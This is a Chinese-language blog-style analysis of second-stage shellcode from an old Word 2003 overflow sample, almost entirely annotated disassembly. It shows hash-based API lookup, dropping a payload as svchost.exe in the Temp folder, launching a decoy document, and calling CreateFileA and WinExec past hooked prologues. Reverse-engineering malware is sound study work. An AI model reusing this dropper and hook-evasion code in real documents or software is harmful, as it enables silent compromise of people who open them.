前段时间从朋友处拿到一个Word的溢出样本,看了下,应该是很老的漏洞洞了,Office2003不开补丁有效,打了SP补丁就无效,本时我对这方面研究的不太多,就分析分析当学习,
Word溢出Shellcode分析
。这里不进溢出的原因、构造什么的,只分析它的Shellcode,它的Shellcode也是有两段的,重点功能在第二段上,里面用到了不少不错的想法,它有以下特点:
1。在Kernel32 模块中查找API用了HASH法,方便并可缩小shellcode体积。
2。里面有一段根据文件大小获得文件句柄的算法很巧妙。
3。Shellcode调用CreateFileA、Winexec时考虑了此函数可能被Hook,从函数开头第5字节开始执行。
07fe6000 55 push ebp
07fe6001 8bec mov ebp,esp
07fe6003 81ec60050000 sub esp,560h
07fe6009 8bf4 mov esi,esp
07fe600b e8d8020000 call 07fe62e8
07fe6010 8906 mov dword ptr [esi],eax //7c800000
07fe6012 895e04 mov dword ptr [esi+4],ebx
07fe6015 ff36 push dword ptr [esi]
07fe6017 68a517007c push 7C0017A5h
07fe601c e8fa020000 call 07fe631b
07fe6021 894608 mov dword ptr [esi+8],eax//CreateFileA
07fe6024 ff36 push dword ptr [esi]
07fe6026 681f790ae8 push 0E80A791Fh
07fe602b e8eb020000 call 07fe631b
07fe6030 89460c mov dword ptr [esi+0Ch],eax//WriteFile
07fe6033 ff36 push dword ptr [esi]
07fe6035 68fb97fd0f push 0FFD97FBh
07fe603a e8dc020000 call 07fe631b
07fe603f 894610 mov dword ptr [esi+10h],eax//CloseHandle
07fe6042 ff36 push dword ptr [esi]
07fe6044 6898fe8a0e push 0E8AFE98h
07fe6049 e8cd020000 call 07fe631b
07fe604e 894614 mov dword ptr [esi+14h],eax//WinExec
07fe6051 ff36 push dword ptr [esi]
07fe6053 683b4743dd push 0DD43473Bh
07fe6058 e8be020000 call 07fe631b
07fe605d 89462c mov dword ptr [esi+2Ch],eax//lstrlenA
07fe6060 ff36 push dword ptr [esi]
07fe6062 68fb499bcb push 0CB9B49FBh
07fe6067 e8af020000 call 07fe631b
07fe606c 894630 mov dword ptr [esi+30h],eax//lstrcpyA
07fe606f ff36 push dword ptr [esi]
07fe6071 683b4673cb push 0CB73463Bh
07fe6076 e8a0020000 call 07fe631b
07fe607b 894634 mov dword ptr [esi+34h],eax//lstrcatA
07fe607e ff36 push dword ptr [esi]
07fe6080 6883b9b578 push 78B5B983h
07fe6085 e891020000 call 07fe631b
07fe608a 894624 mov dword ptr [esi+24h],eax//TerminateProcess
07fe608d ff36 push dword ptr [esi]
07fe608f 6833ca8a5b push 5B8ACA33h
07fe6094 e882020000 call 07fe631b
07fe6099 894628 mov dword ptr [esi+28h],eax//GetTempPathA
07fe609c ff36 push dword ptr [esi]
07fe609e 68f94a63c1 push 0C1634AF9h
07fe60a3 e873020000 call 07fe631b
07fe60a8 894638 mov dword ptr [esi+38h],eax//WideCharToMultiByte
07fe60ab 837e0400 cmp dword ptr [esi+4],0
07fe60af 0f842b020000 je 07fe62e0
07fe60b5 ff7604 push dword ptr [esi+4]
07fe60b8 68929cd34f push 4FD39C92h
07fe60bd e859020000 call 07fe631b
07fe60c2 894640 mov dword ptr [esi+40h],eax//ZwQueryVirtualMemory
07fe60c5 54 push esp
07fe60c6 6808020000 push 208h
07fe60cb 8d464c lea eax,[esi+4Ch]
07fe60ce 50 push eax
07fe60cf 6a02 push 2
07fe60d1 ff37 push dword ptr [edi]
07fe60d3 6aff push 0FFFFFFFFh
07fe60d5 ff5640 call dword ptr [esi+40h]//ZwQueryVirtualMemory
07fe60d8 8bc4 mov eax,esp
07fe60da 6a00 push 0
07fe60dc 6a00 push 0
07fe60de 68ff000000 push 0FFh
07fe60e3 8d9e5c040000 lea ebx,[esi+45Ch]
07fe60e9 53 push ebx
07fe60ea 68f0010000 push 1F0h
07fe60ef 8d464c lea eax,[esi+4Ch]
07fe60f2 83c008 add eax,8
07fe60f5 50 push eax
07fe60f6 6a00 push 0
07fe60f8 6a00 push 0
07fe60fa ff5638 call dword ptr [esi+38h]//WideCharToMultiByte
07fe60fd 8d9e58030000 lea ebx,[esi+358h]
07fe6103 53 push ebx
07fe6104 68ff000000 push 0FFh
07fe6109 ff5628 call dword ptr [esi+28h]//GetTempPathA
07fe610c 8d9658030000 lea edx,[esi+358h]
07fe6112 52 push edx
07fe6113 8d9654020000 lea edx,[esi+254h]
07fe6119 52 push edx
07fe611a ff5630 call dword ptr [esi+30h]//lstrcpyA
07fe611d 8d965c040000 lea edx,[esi+45Ch]
07fe6123 52 push edx
07fe6124 ff562c call dword ptr [esi+2Ch]//lstrlenA
07fe6127 8bc8 mov ecx,eax
07fe6129 49 dec ecx
07fe612a 803c0a5c cmp byte ptr [edx+ecx],5Ch
07fe612e 75f9 jne 07fe6129
07fe6130 41 inc ecx
07fe6131 03d1 add edx,ecx
07fe6133 52 push edx
07fe6134 8d9654020000 lea edx,[esi+254h]
07fe613a 52 push edx
07fe613b ff5634 call dword ptr [esi+34h]//lstrcatA
07fe613e 8d9658030000 lea edx,[esi+358h]
07fe6144 52 push edx
07fe6145 8d564c lea edx,[esi+4Ch]
07fe6148 52 push edx
07fe6149 ff5630 call dword ptr [esi+30h]//lstrcpyA
07fe614c ff7704 push dword ptr [edi+4]//svchost.exe
07fe614f 8d9658030000 lea edx,[esi+358h]
07fe6155 52 push edx
07fe6156 ff5634 call dword ptr [esi+34h]//lstrcatA
07fe6159 8b5704 mov edx,dword ptr [edi+4]//svchost.exe
07fe615c 8b4718 mov eax,dword ptr [edi+18h]//strlen(svchost.exe)=b
07fe615f c6040200 mov byte ptr [edx+eax],0
07fe6163 ff7704 push dword ptr [edi+4]//svchost.exe
07fe6166 8d564c lea edx,[esi+4Ch]
07fe6169 52 push edx
07fe616a ff5634 call dword ptr [esi+34h]//lstrcatA
07fe616d 8d464c lea eax,[esi+4Ch]
07fe6170 e824010000 call 07fe6299 //调用自己处理过的CreateFileA
07fe6175 894648 mov dword ptr [esi+48h],eax
07fe6178 8b5708 mov edx,dword ptr [edi+8] --PE
07fe617b 8a02 mov al,byte ptr [edx] --文件内容头两字节有交换
07fe617d 8a6201 mov ah,byte ptr [edx+1]
07fe6180 8822 mov byte ptr [edx],ah
07fe6182 884201 mov byte ptr [edx+1],al
07fe6185 54 push esp
07fe6186 8d0424 lea eax,[esp]
07fe6189 6a00 push 0
07fe618b 50 push eax
07fe618c ff770c push dword ptr [edi+0Ch] //0000524c文件大小
07fe618f 52 push edx //07fe637e
07fe6190 ff7648 push dword ptr [esi+48h]
07fe6193 ff560c call dword ptr [esi+0Ch] //Write \DOCUME~1\LANGOU~1\LOCALS~1\Temp\svchost.exe
07fe6196 5b pop ebx
07fe6197 8d8654020000 lea eax,[esi+254h]
07fe619d e8f7000000 call 07fe6299 //调用自己处理过的CreateFileA
07fe61a2 894644 mov dword ptr [esi+44h],eax
07fe61a5 8b5710 mov edx,dword ptr [edi+10h]//这里指向真正的word开头,开头被移位加密
07fe61a8 668b02 mov ax,word ptr [edx]
07fe61ab 66c1c008 rol ax,8
07fe61af 668902 mov word ptr [edx],ax
07fe61b2 668b4202 mov ax,word ptr [edx+2]
07fe61b6 66c1c008 rol ax,8
07fe61ba 66894202 mov word ptr [edx+2],ax
07fe61be 54 push esp
07fe61bf 8d0424 lea eax,[esp]
07fe61c2 6a00 push 0
07fe61c4 50 push eax
07fe61c5 ff7714 push dword ptr [edi+14h]
07fe61c8 ff7710 push dword ptr [edi+10h]
07fe61cb ff7644 push dword ptr [esi+44h]
07fe61ce ff560c call dword ptr [esi+0Ch]//WriteFile 写入真正的word
07fe61d1 5b pop ebx
07fe61d2 ff7648 push dword ptr [esi+48h]
07fe61d5 ff5610 call dword ptr [esi+10h]//CloseHandle
07fe61d8 ff7644 push dword ptr [esi+44h]
07fe61db ff5610 call dword ptr [esi+10h]//CloseHandle
07fe61de 8d9e54020000 lea ebx,[esi+254h]
07fe61e4 53 push ebx
07fe61e5 ff562c call dword ptr [esi+2Ch]//lstrlenA
07fe61e8 c6040322 mov byte ptr [ebx+eax],22h
07fe61ec c644030100 mov byte ptr [ebx+eax+1],0
07fe61f1 83eb24 sub ebx,24h
07fe61f4 3ec743202f712022 mov dword ptr ds:[ebx+20h],2220712Fh
07fe61fc 3ec7431c202f7720 mov dword ptr ds:[ebx+1Ch],20772F20h
07fe6204 3ec743182e657865 mov dword ptr ds:[ebx+18h],6578652Eh
07fe620c 3ec74314776f7264 mov dword ptr ds:[ebx+14h],64726F77h
07fe6214 3ec743102077696e mov dword ptr ds:[ebx+10h],6E697720h
07fe621c 3ec7430c74617274 mov dword ptr ds:[ebx+0Ch],74726174h
07fe6224 3ec743082f632073 mov dword ptr ds:[ebx+8],7320632Fh
07fe622c 3ec7430465786520 mov dword ptr ds:[ebx+4],20657865h
07fe6234 3ec703636d642e mov dword ptr ds:[ebx],2E646D63h
07fe623b e885000000 call 07fe62c5//调用自己处理过防Hook的Winexec
07fe6240 8d9e58030000 lea ebx,[esi+358h]
07fe6246 e87a000000 call 07fe62c5//调用自己处理过防Hook的Winexec
07fe624b b960000000 mov ecx,60h
07fe6250 2be1 sub esp,ecx
07fe6252 8bd7 mov edx,edi
07fe6254 8bde mov ebx,esi
07fe6256 54 push esp
07fe6257 5f pop edi
07fe6258 e80a000000 call 07fe6267 //得到Shellcode的位置
07fe625d 8bf0 mov esi,eax
07fe625f f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
07fe6261 8bfa mov edi,edx
07fe6263 8bf3 mov esi,ebx
07fe6265 eb18 jmp 07fe627f//运行真实的Word后自身退出
07fe6267 e800000000 call 07fe626c //得到Shellcode的位置
07fe626c 58 pop eax
07fe626d 83c005 add eax,5
07fe6270 c3 ret
07fe6271 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
07fe6273 33c0 xor eax,eax
07fe6275 8bcb mov ecx,ebx
07fe6277 f3aa rep stos byte ptr es:[edi]
07fe6279 6a00 push 0
07fe627b 6aff push 0FFFFFFFFh
07fe627d ffd5 call ebp
07fe627f 8b4f14 mov ecx,dword ptr [edi+14h]
07fe6282 8b07 mov eax,dword ptr [edi]
07fe6284 8bd0 mov edx,eax
07fe6286 03d1 add edx,ecx
07fe6288 8b5f10 mov ebx,dword ptr [edi+10h]
07fe628b 03d9 add ebx,ecx
07fe628d 2bda sub ebx,edx
07fe628f 8b6e24 mov ebp,dword ptr [esi+24h]//TerminateProcess
07fe6292 8b7710 mov esi,dword ptr [edi+10h]
07fe6295 8b3f mov edi,dword ptr [edi]
07fe6297 ffe4 jmp esp
07fe6299 59 pop ecx //自己处理过防Hook的CreateFileA
07fe629a 6a00 push 0
07fe629c 6880000000 push 80h
07fe62a1 6a04 push 4
07fe62a3 6a00 push 0
07fe62a5 6a01 push 1
07fe62a7 68000000c0 push 0C0000000h
07fe62ac 50 push eax
07fe62ad 8b5608 mov edx,dword ptr [esi+8]//CreateFileA
07fe62b0 83c205 add edx,5
07fe62b3 803a08 cmp byte ptr [edx],8
07fe62b6 51 push ecx
07fe62b7 55 push ebp
07fe62b8 8bec mov ebp,esp
07fe62ba 7402 je 07fe62be
07fe62bc ffe2 jmp edx
07fe62be 36ff7508 push dword ptr ss:[ebp+8]
07fe62c2 42 inc edx
07fe62c3 ffe2 jmp edx
07fe62c5 59 pop ecx//自己处理过防Hook的Winexec
07fe62c6 6a00 push 0
07fe62c8 53 push ebx
07fe62c9 8b5614 mov edx,dword ptr [esi+14h]//WinExec
07fe62cc 83c205 add edx,5
07fe62cf 51 push ecx
07fe62d0 55 push ebp
07fe62d1 8bec mov ebp,esp
07fe62d3 803a54 cmp byte ptr [edx],54h
07fe62d6 7402 je 07fe62da
07fe62d8 ffe2 jmp edx
07fe62da 83ec54 sub esp,54h
07fe62dd 42 inc edx
07fe62de ffe2 jmp edx
07fe62e0 6a00 push 0
07fe62e2 6aff push 0FFFFFFFFh
07fe62e4 ff5624 call dword ptr [esi+24h]//TerminateProcess
07fe62e7 c3 ret
07fe62e8 55 push ebp
07fe62e9 56 push esi
07fe62ea 64a130000000 mov eax,dword ptr fs:[00000030h]
07fe62f0 85c0 test eax,eax
07fe62f2 7813 js 07fe6307
07fe62f4 3e8b400c mov eax,dword ptr ds:[eax+0Ch]
07fe62f8 3e8b701c mov esi,dword ptr ds:[eax+1Ch]
07fe62fc 3e8b5e08 mov ebx,dword ptr ds:[esi+8]//CreateFileA
07fe6300 ad lods dword ptr [esi]
07fe6301 3e8b6808 mov ebp,dword ptr ds:[eax+8]
07fe6305 eb0d jmp 07fe6314
07fe6307 3e8b4034 mov eax,dword ptr ds:[eax+34h]
07fe630b 3e8ba8b8000000 mov ebp,dword ptr ds:[eax+0B8h]
07fe6312 33db xor ebx,ebx
07fe6314 8bc5 mov eax,ebp
07fe6316 5e pop esi
07fe6317 5d pop ebp
07fe6318 c20400 ret 4
07fe631b 53 push ebx
07fe631c 55 push ebp
07fe631d 56 push esi
07fe631e 57 push edi
07fe631f 368b6c2418 mov ebp,dword ptr ss:[esp+18h]
07fe6324 368b453c mov eax,dword ptr ss:[ebp+3Ch]
07fe6328 368b540578 mov edx,dword ptr ss:[ebp+eax+78h]
07fe632d 03d5 add edx,ebp
07fe632f 3e8b4a18 mov ecx,dword ptr ds:[edx+18h]
07fe6333 3e8b5a20 mov ebx,dword ptr ds:[edx+20h]
07fe6337 03dd add ebx,ebp
07fe6339 e338 jecxz 07fe6373
07fe633b 49 dec ecx
07fe633c 3e8b348b mov esi,dword ptr ds:[ebx+ecx*4]
07fe6340 03f5 add esi,ebp
07fe6342 33ff xor edi,edi
07fe6344 fc cld
07fe6345 33c0 xor eax,eax
07fe6347 ac lods byte ptr [esi]
07fe6348 3ac4 cmp al,ah
07fe634a 7407 je 07fe6353
07fe634c c1cf0d ror edi,0Dh
07fe634f 03f8 add edi,eax
07fe6351 ebf2 jmp 07fe6345
07fe6353 363b7c2414 cmp edi,dword ptr ss:[esp+14h]
07fe6358 75df jne 07fe6339
07fe635a 3e8b5a24 mov ebx,dword ptr ds:[edx+24h]
07fe635e 03dd add ebx,ebp
07fe6360 663e8b0c4b mov cx,word ptr ds:[ebx+ecx*2]
07fe6365 3e8b5a1c mov ebx,dword ptr ds:[edx+1Ch]
07fe6369 03dd add ebx,ebp
07fe636b 3e8b048b mov eax,dword ptr ds:[ebx+ecx*4]
07fe636f 03c5 add eax,ebp
07fe6371 eb02 jmp 07fe6375
07fe6373 33c0 xor eax,eax
07fe6375 8bd5 mov edx,ebp
07fe6377 5f pop edi
07fe6378 5e pop esi
07fe6379 5d pop ebp
07fe637a 5b pop ebx
07fe637b c20800 ret 8